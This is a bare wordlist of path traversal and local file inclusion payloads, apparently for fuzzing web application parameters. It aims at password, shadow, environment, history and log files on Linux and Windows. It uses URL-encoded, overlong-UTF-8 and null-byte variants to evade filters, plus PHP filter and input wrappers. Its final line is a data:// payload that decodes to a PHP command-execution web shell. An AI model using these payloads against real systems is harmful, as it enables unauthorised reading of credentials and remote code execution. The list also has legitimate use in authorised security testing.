/etc/passwd
//etc/passwd
////etc/passwd
/etc/shadow
/etc/groups
/etc/profile
/etc/bashrc
/etc/hosts
/etc/resolv.conf
/proc/version
/proc/cpuinfo
/proc/self/environ
/proc/self/cmdline
/.bash_history
/var/log/auth.log
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/etc/php.ini
C:/windows/win.ini
C:\windows\win.ini
/windows/win.ini
/windows/system.ini
/windows/system32/drivers/etc/hosts
/boot.ini
xampp/apache/conf/httpd.conf
../../../../etc/passwd
../../../../etc/shadow
../../../../etc/groups
../../../../etc/profile
../../../../etc/bashrc
../../../../etc/issue
../../../../etc/hosts
../../../../etc/resolv.conf
../../../../proc/version
../../../../proc/cpuinfo
../../../../proc/self/environ
../../../../proc/self/cmdline
../../../../.bash_history
../../../../var/log/apache2/access.log
../../../../var/log/nginx/access.log
../../../../etc/php.ini
../../../../boot.ini
../../../../windows/win.ini
../../../../windows/system.ini
../../../../windows/system32/drivers/etc/hosts
../../../../../../../../etc/passwd
..//..//..//..//etc/passwd
..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
./\/.//./\/.//etc/passwd
....//....//....//....//etc/passwd
..../..../..../..../etc/passwd
../../../../etc/passwd%00.jpg
../../../../etc/passwd%00.png
../../../../etc/passwd%00index.html
../../../../boot.ini%00
php://filter/resource=index.php
php://filter/resource=config.php
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://input
file:///etc/passwd
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
